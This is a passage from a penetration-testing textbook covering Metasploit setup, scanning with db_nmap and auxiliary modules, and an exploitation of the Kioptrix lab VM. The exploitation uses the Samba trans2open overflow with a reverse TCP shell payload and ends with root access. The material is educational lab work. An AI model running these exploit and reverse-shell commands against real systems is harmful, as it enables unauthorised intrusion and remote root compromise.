Metasploit – learn it and love it

The Metasploit™ framework is incredible. It offers penetration testers a wide variety of tools in a friendly, easy to use manner. It was originally created by HD Moore and has been purchased by Rapid7, the creators of the Nexpose vulnerability scanner toolkit. Everything that we have done manually can be done with Metasploit.

Tip

If you are new to penetration testing, I highly recommend that you go through the free training provided at http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training to get a really good grasp of how powerful this framework really is. This site is constantly updated and should be visited frequently to find information about the latest additions to the MSF framework.

In this book, we restrict our scope to some of the more interesting features of the MSF framework to highlight the efficiency it adds to the work a penetration tester must do. Starting with Kali 2.0, Metasploit no longer runs as a service and requires some configuration before it can be used. Enter the following commands:

# /etc/init.d/postgresql start
# msfdb init
# msfconsole

These commands will yield output similar to the following:

[Metasploit ASCII-art banner]

       =[ metasploit v4.11.2-dev [core:4.2 api:1.0]
+ -- --=[ 1454 exploits - 829 auxiliary - 229 post
+ -- --=[ 376 payloads - 37 encoders - 8 nops

msf >

Databases and Metasploit

One of the most popular Metasploit features is the ability to have all of your results dumped into a database. Metasploit uses PostgreSQL by default. In a new terminal window, enter the following:

# su postgres -c psql
  psql (9.4.3)
  Type "help" for help.

We will now change the password for the default database user:

postgres=# ALTER USER postgres WITH PASSWORD 'myPassword';
ALTER ROLE

Tip

To avoid typing this information every time you run Metasploit, change the default database.yml file to reflect this connection string.

Here, we changed the password for the postgres role. We will use \q to exit the postgres console.

postgres=# \q

At the msf > prompt, type the following (the database host is not shown in the original; replace the placeholder with the address of your PostgreSQL server):

msf > db_disconnect
msf > db_connect postgres:myPassword@<db-host>/pentester
msf > db_status
  [*] postgresql connected to postgres

Now, we know that we are connected to the PostgreSQL database named pentester. We can verify connectivity by typing:

msf> hosts
  Hosts
  =====

  address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
  -------  ---  ----  -------  ---------  -----  -------  ----  --------

The previous command will provide us with a listing of hosts. As you can see, there is nothing interesting just yet.

Performing an nmap scan from within Metasploit

We need something exciting to display when running the hosts command, so let's run a quick Nmap scan to collect some data. With msfconsole open and the database connected, we can now run our Nmap scans directly from within Metasploit.

msf> db_nmap -nO -sTU -pT:22,80,111,139,443,32768,U:111,137,32768 192.168.75.14

The results look very familiar with the added bonus of having been added to the database for future reference:

[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-08-04 21:47 EDT
[*] Nmap: Nmap scan report for 192.168.75.14
[*] Nmap: Host is up (0.00059s latency).
[*] Nmap: PORT      STATE         SERVICE
[*] Nmap: 22/tcp    open          ssh
[*] Nmap: 80/tcp    open          http
[*] Nmap: 111/tcp   open          rpcbind
[*] Nmap: 139/tcp   open          netbios-ssn
[*] Nmap: 443/tcp   open          https
[*] Nmap: 32768/tcp open          filenet-tms
[*] Nmap: 111/udp   open          rpcbind
[*] Nmap: 137/udp   open          netbios-ns
[*] Nmap: 32768/udp open|filtered omad
[*] Nmap: MAC Address: 08:00:27:21:21:62 (Cadmus Computer Systems)
[*] Nmap: Warning: OS Scan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.4.X
[*] Nmap: OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.00 seconds

If we run a quick hosts command, we will see that the system has been added to our PostgreSQL pentester database:

msf> hosts
  Hosts
  =====

  address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
  -------        ---                ----  -------  ---------  -----  -------  ----  --------
  192.168.75.14  08:00:27:21:21:62        Linux    3.X               device

Now that the data is in the database, there are all sorts of handy time-saving tricks that we can perform. For instance, if we would like to see which systems have port 443 open, we can enter:

msf > services -p 443

This provides us with a nicely formatted listing of all the systems with port 443 open:

Services
========

host           port  proto  name   state  info
----           ----  -----  ----   -----  ----
192.168.75.14  443   tcp    https  open
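As an added example (not part of the book or of Metasploit itself), the following Python reproduces what the database gives us above: it turns the `[*] Nmap:` lines that db_nmap prints into service records, answers the same question as `services -p 443`, and adds a defender-side check that flags open ports missing from an allow-list. The sample output is a constructed copy of the scan lines shown earlier, and the allow-list is an assumed baseline.

```python
import re
from collections import namedtuple

# One row of the msfconsole 'services' table.
Service = namedtuple("Service", "host port proto name state")

# Constructed sample: the db_nmap lines from the scan above, as msfconsole prints them.
SAMPLE_OUTPUT = """\
[*] Nmap: Nmap scan report for 192.168.75.14
[*] Nmap: Host is up (0.00059s latency).
[*] Nmap: PORT      STATE         SERVICE
[*] Nmap: 22/tcp    open          ssh
[*] Nmap: 80/tcp    open          http
[*] Nmap: 139/tcp   open          netbios-ssn
[*] Nmap: 443/tcp   open          https
[*] Nmap: 137/udp   open          netbios-ns
[*] Nmap: 32768/udp open|filtered omad
[*] Nmap: MAC Address: 08:00:27:21:21:62 (Cadmus Computer Systems)
"""

HOST_RE = re.compile(r"^\[\*\] Nmap: Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^\[\*\] Nmap: (\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_db_nmap(output):
    """Turn msfconsole's '[*] Nmap:' lines into Service records, like the services table."""
    services, host = [], None
    for line in output.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)        # subsequent port lines belong to this host
            continue
        m = PORT_RE.match(line)
        if m and host:
            port, proto, state, name = m.groups()
            services.append(Service(host, int(port), proto, name, state))
    return services


def services_on_port(services, port, state="open"):
    """Equivalent of 'services -p <port>': hosts with that port in the given state."""
    return [s for s in services if s.port == port and s.state == state]


def unexpected_services(services, allowed):
    """Defender check (assumed baseline): open services not in the allow-list of (port, proto)."""
    return [s for s in services if s.state == "open" and (s.port, s.proto) not in allowed]
```

Ports reported as open|filtered are left out of the allow-list check on purpose, since Nmap could not confirm them; treat them as items to verify, not as findings.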

Using auxiliary modules

To load an auxiliary module, use the following command:

msf> use auxiliary/scanner/portscan/tcp

The use command instructs Metasploit to use the specified module:

msf  auxiliary(tcp) > show options

Every module has a specific set of options that can be displayed via the show options command. This particular module has the following options that can be changed:

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   FILTER                        no        The filter string for capturing traffic
   INTERFACE                     no        The name of the interface
   PCAPFILE                      no        The name of the PCAP capture file to process
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   SNAPLEN      65535            yes       The number of bytes to capture
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

We need to change a few of these to suit our needs:

msf  auxiliary(tcp) > set RHOSTS 192.168.75.14

RHOSTS is our target range. We set it to 192.168.75.14:

msf  auxiliary(tcp) > set PORTS 1-1024

To save time, we restrict the scan to the first 1024 ports with set PORTS.

msf  auxiliary(tcp) > run

The run command will initiate the scan using our predetermined settings. In a few moments, we will receive feedback from the console:

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The important item of note here is that all modules operate in the same manner. Once you understand the method of searching for exploits, you will be able to reuse the same steps repeatedly.

Using Metasploit to exploit Kioptrix

The time has come to take a look at using Metasploit to perform an attack against our Kioptrix machine. Since we already know how to compile and use proof of concept code found on the Internet, we will quickly appreciate the time savings that Metasploit provides. We will begin by connecting to our database (as before, the database host is not shown in the original; replace the placeholder with the address of your PostgreSQL server).

# msfconsole
msf > db_connect postgres:myPassword@<db-host>/pentester

We should already have some information in our database. This can be verified using:

msf > services

This command provides us with the following output:

Services
========

host           port   proto  name         state  info
----           ----   -----  ----         -----  ----
192.168.75.14  22     tcp    ssh          open
192.168.75.14  80     tcp    http         open
192.168.75.14  111    udp    rpcbind      open
192.168.75.14  111    tcp    rpcbind      open
192.168.75.14  137    udp    netbios-ns   open
192.168.75.14  139    tcp    netbios-ssn  open
192.168.75.14  443    tcp    https        open
192.168.75.14  32768  tcp    filenet-tms  open
192.168.75.14  32768  udp    omad         open

When reviewing these ports, we find our previously exploited Samba port 139, which is still open. Now, it is time to see what we can do without having to rework the exploit code.

msf> search samba

This results in a listing of matching modules with the following columns:

  • Name: The name column will be used together with the use command once we decide which exploit to try
  • Disclosure: The disclosure date is the actual date that the vulnerability was made known to the community or the vendor, not when the proof of concept code was released
  • Rank: This is very important since it indicates just how reliable the exploit is known to be
  • Description: This is, well… the description of the type of exploit this is

We will be using the trans2open exploit as it is similar to what we performed manually earlier in the chapter. In msfconsole, type:

msf > use exploit/linux/samba/trans2open

When more information regarding an exploit is needed, we can use the info command to receive the following output:

msf  exploit(trans2open) > info

       Name: Samba trans2open Overflow (Linux x86)
     Module: exploit/linux/samba/trans2open
   Platform: Linux
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2003-04-07

Provided by:
  hdm <[email protected]>
  jduck <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Samba 2.2.x - Bruteforce

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  139              yes       The target port

Payload information:
  Space: 1024
  Avoid: 1 characters

Description:
  This exploits the buffer overflow found in Samba versions 2.2.0 to
  2.2.8. This particular module is capable of exploiting the flaw on
  x86 Linux systems that do not have the noexec stack option set.
  NOTE: Some older versions of RedHat do not seem to be vulnerable
  since they apparently do not allow anonymous access to IPC.

References:
  http://cvedetails.com/2003-0201
  http://www.osvdb.org/4469
  http://www.securityfocus.com/bid/7294
  http://seclists.org/bugtraq/2003/Apr/103

This information is available for all of the exploits in Metasploit. When time permits, familiarizing yourself with some of the most commonly used exploits will pay off in the long term, as you will be able to avoid trying exploits that do not work on production systems.

Now, we need to set some of the options that are available:

msf > set RHOST 192.168.75.14

RHOST is the remote host and needs to be set to our Kioptrix machine's IP address.

msf > show payloads

An example of the output of this command is shown in the following image:


The show payloads command provides a listing of all of the compatible payloads that can be used with this particular exploit. We will make use of reverse_tcp for this example. This payload type is small and usually effective, although it does not have the full range of options available that Meterpreter does.

> set payload linux/x86/shell/reverse_tcp

We will also have to set the LHOST and LPORT.

> set LHOST 192.168.75.12

This is our local host, on which the listener will be set up.

> set LPORT 2222

This is the port that we would like to listen on.

Now that is out of the way, we can move on to exploitation:

> exploit

If all goes as planned, you will receive the following confirmation and an open session that is very similar to the connection our manually compiled exploit provided us with earlier in the chapter.

msf  exploit(trans2open) > exploit

  [*] Started reverse handler on 192.168.75.12:2221
  [*] Trying return address 0xbffffdfc...
  [*] Trying return address 0xbffffcfc...
  [*] Trying return address 0xbffffbfc...
  [*] Trying return address 0xbffffafc...
  [*] Sending stage (36 bytes) to 192.168.75.14
  [*] Command shell session 2 opened (192.168.75.12:2221 -> 192.168.75.14:32802) at 2015-08-04 23:22:06 -0500

To ensure that we have root, we will perform the following commands:

# mail
  Mail version 8.1 6/6/93.  Type ? for help.
  "/var/mail/root": 6 messages 6 unread
  >U  1 [email protected]   Sat Sep 26 11:42  15/481   "About Level 2"
  U  2 [email protected]  Thu Nov 10 19:34  19/534   "LogWatch for kioptrix"
  U  3 [email protected]  Fri Nov 11 14:38  48/1235  "LogWatch for kioptrix"
  U  4 [email protected]  Sun Nov 13 15:12  19/534   "LogWatch for kioptrix"
  U  5 [email protected]  Mon Nov 14 18:23 244/12279 "LogWatch for kioptrix"
  U  6 [email protected]  Wed Nov 16 15:19  19/534   "LogWatch for kioptrix"

We are looking at the messages for the root account and can see that Loneferret has left us a nice little message; type 1 to read it:

# 1
  Message 1:
  From root  Sat Sep 26 11:42:10 2009
  Date: Tue, 04 Aug 2015 11:42:10 -0400
  From: root <[email protected]>
  To: [email protected]
  Subject: About Level 2

  If you are reading this, you got root. Congratulations.
  Level 2 won't be as easy...

This last exercise should have made it clear that, compared to manually finding and compiling code, using Metasploit is a breeze. The best part about it is that you will be able to add your own modules and compiled code to the framework as well.
